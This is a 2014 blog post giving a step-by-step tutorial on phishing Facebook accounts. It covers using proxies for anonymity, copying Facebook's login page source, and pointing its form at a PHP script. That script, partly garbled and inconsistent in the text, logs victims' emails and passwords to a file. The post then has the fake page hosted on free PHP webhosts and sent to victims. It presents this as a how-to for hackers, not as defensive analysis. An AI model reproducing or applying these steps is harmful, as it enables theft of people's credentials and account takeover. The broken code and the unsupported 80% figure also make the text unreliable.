Monday, 10 November 2014

How to hack a Facebook account by phishing method????

          Breaking from the internet in computer network

Firstly to make anonymous yourself it must. Search for proxy like services. Here I am referring some proxies which can help you to be anonymous at the internet.

Proxy service first:
Homepage= any homepage working in your area like,

Proxy service second:
Homepage= any homepage working in your area like,


Phishing is a method to obtain sensitive usernames and passwords, credit card numbers, bank accounts etc.
A case shows that about 80% of email accounts such as Facebook, yahoo, Hotmail etc. get hacked with the phishing method.

First method: fake login pages
In this method a hacker creates a fake page of any website such as PayPal, yahoo, Gmail, Facebook, orkut etc. similar to the original and asks the victim to login through that page.
Once the victim login through that page his email id and password gets stored and hence gets his account hacked.

Here I am taking an example:
    1Firstly choose a target. Here I choose which is most popular target among all.

2.     Next you would go to the target site i.e. Facebook and right click on it and click on view source.

3.     Now you would copy the source it into a WordPad or notepad and rename it with like facebook.htm (here I use WordPad).

4.     Now open Facebook.htm in a WordPad. Right click the file and click on open with and select WordPad. Now search for “Form method” you will see something like this:

Now change the action=” to “Pass.php” and change method=“post” to “Get”.

5.     Next you would hacker create a PHP script which would save the entered username and password and save it something like pass.php. The code for the script is:

<? php /* Created on: 11/11/2014 */
$fp = fopen("FacebookPasswords.htm", "a");
fwrite($fp, "Email:$_POST[email]\password:
Echo "<HTML>
<title>Welcome to Facebook</title>
<FRAMESET cols=\"*\">

Note: here is the redirection URL when the victim will enter his username and password in the fake page he will be redirected tp so he won’t become suspicious.

6.     Now you would create an account on webhosting site that supports php to upload the files. Some of popular free hosting sites are:

7.   Next you would upload the two files facebook.htm and pass.php to one of these sites.

8.     Once you have uploaded both the files to a webhosting site.

9.     Now as you can see that is the fake page which the hacker will sent to the victim. Once the victim will enter his username and password it will be saved in a .txt file

10.    Now the hacker will just download the file and view the saved password inside.

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